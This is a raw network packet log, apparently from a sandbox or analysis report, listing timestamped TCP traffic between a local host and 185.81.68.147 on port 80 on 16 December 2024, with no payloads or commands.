                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.026388884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.026427031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.027107000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.027141094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.027178049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.028088093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.028121948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.028178930 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.029176950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.029213905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.029252052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.029678106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.029772043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.029808044 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.030637026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.030669928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.030706882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.031409025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.031619072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.031656981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.032351017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.032426119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.032479048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.033315897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.033369064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.033409119 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.034092903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.034195900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.034235954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.034914970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.035034895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.035077095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.035778046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.035928011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.035964966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.036799908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.037009001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.037065983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.037574053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.037662029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.037702084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.038403988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.090300083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.184457064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.184618950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.184691906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.184881926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.185043097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.185075045 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.185128927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.185950994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.185982943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.186011076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.186971903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.187009096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.187009096 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.187654018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.187689066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.187757969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.188560009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.188594103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.188595057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.189424992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.189460039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.189496994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.190362930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.190417051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.190433025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.191215038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.191252947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.191322088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.192065001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.192102909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.192163944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.192941904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.192991018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.193027973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.193839073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.193890095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.193918943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.194912910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.194957018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.194986105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.195574999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.195620060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.195669889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.196438074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.196476936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.196482897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.197365046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.197403908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.197455883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.198225975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.198265076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.198270082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.199119091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.199157953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.199258089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.200093031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.200138092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.200167894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.200824976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.200867891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.200911045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.201719046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.201760054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.201843023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.202761889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.202811003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.202847004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.203558922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.203597069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.203625917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.204389095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.204421043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.204494953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.205255032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.205293894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.205363035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.206119061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.206165075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.206207991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.206973076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.207016945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.207128048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.207874060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.207909107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.207921028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.208753109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.208796978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.208868980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.209589958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.209626913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.209703922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.210494041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.210529089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.210589886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.211349010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.211381912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.211446047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.212249994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.212291956 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.212357998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.213136911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.213171005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.213213921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.214059114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.214096069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.214140892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.214947939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.214989901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.215034008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.215737104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.215775013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.215840101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.216617107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.216660976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.216687918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.217520952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.217561960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.217623949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.218441010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.218455076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.218481064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.219276905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.219321012 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.219361067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.220129967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.220161915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.220241070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.220761061 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.220999002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.221040010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.221044064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.221868992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.221910954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.221976995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.222754955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.222830057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.222866058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.223634958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.223691940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.223720074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.224543095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.224582911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.224653006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.225399017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.225436926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.225492001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.226280928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.226321936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.226382017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.227197886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.227243900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.227278948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.228020906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.228061914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.228126049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.228904963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.228941917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.228987932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.229963064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.230001926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.230066061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.277751923 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.377058029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.377109051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.377182007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.377310991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.377428055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.377485991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.378211021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.378317118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.378369093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.379045010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.379174948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.379245996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.379905939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.379983902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.380038023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.380790949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.380939007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.381002903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.381675959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.381772041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.381830931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.382560968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.382926941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.382992029 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.383436918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.383502007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.383552074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.384354115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.384471893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.384555101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.385179996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.385292053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.385345936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.386054993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.386192083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.386241913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.386945009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.387039900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.387136936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.387821913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.387957096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.388005018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.388674021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.388783932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.388839960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.389581919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.389730930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.389791965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.390445948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.390546083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.390600920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.391320944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.391458988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.391515017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.392187119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.392251968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.392302990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.393088102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.393171072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.393225908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.393987894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.394171000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.394213915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.394979954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.395035028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.395090103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.395734072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.395772934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.395828009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.396565914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.396651030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.396701097 CET4972380192.168.2.10185.81.68.147
